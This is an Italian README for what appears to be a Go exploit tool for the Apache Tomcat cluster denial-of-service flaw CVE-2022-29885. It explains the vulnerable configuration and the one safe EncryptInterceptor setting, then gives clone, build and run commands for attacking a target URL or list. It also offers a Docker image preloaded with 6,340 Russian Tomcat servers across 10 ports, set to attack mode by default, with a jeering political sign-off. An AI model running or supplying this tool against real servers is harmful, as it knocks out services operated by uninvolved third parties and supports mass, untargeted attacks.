
Exploit basato su Go per la vulnerabilità Denial of Service di Apache Tomcat (CVE-2022-29885) che prende di mira l'EncryptInterceptor nel NioReceiver di Tomcat Cluster. Invia un pacchetto TCP appositamente modificato per innescare il DoS su qualsiasi versione di Tomcat interessata.
Exploit DoS di Apache Tomcat (CVE-2022-29885).
Denial of Service in EncryptInterceptor (Cluster Tomcat).
La macchina target deve avviare il Cluster Nio Receiver.
L'invio di un pacchetto TCP speciale causerà un Denial of Service al target.
Indipendentemente dall'uso di EncryptInterceptor, esiste la possibilità di una vulnerabilità di denial of service a condizione che:
la funzione cluster di Tomcat sia abilitata e utilizzi NioReceiver per la comunicazione.
Qualsiasi versione di Tomcat sarà vulnerabile. L'unica soluzione è utilizzare una rete affidabile.
Il file di configurazione sicuro server.xml contiene
<Interceptor className="org.apache.catalina.tribes.group.interceptors.EncryptInterceptor"
encryptionAlgorithm="AES/CBC/PKCS5Padding"
encryptionKey="ANY_KEY(LENGTH:32)"/>
Ogni altra variazione di configurazione è insicura.
Applicazione
1. git clone https://github.com/iveresk/CVE-2022-29885.git
2. cd CVE-2022-29885
3. go build -o /cve-2022-29885
4. ./cve-2022-29885 -t <target_url or file_name> [OPTIONAL] -s false -d false
- t - URL o nome file del target
- d - flag debug {true, false} che abilita o disabilita i log
- s - interruttore tra regime sicuro e insicuro. Il valore predefinito è unsafe.
Docker con server Apache Tomcat russi predefiniti 6340 moltiplicati per le 10 porte Tomcat più comuni.
La modalità Unsafe predefinita è pre-impostata.
docker run -d masterroot/cve-2022-29885
Divertiti con i dispositivi VoIP ruzzland-terrorist-state :D

Sei libero di contattarmi tramite Keybase per qualsiasi dettaglio.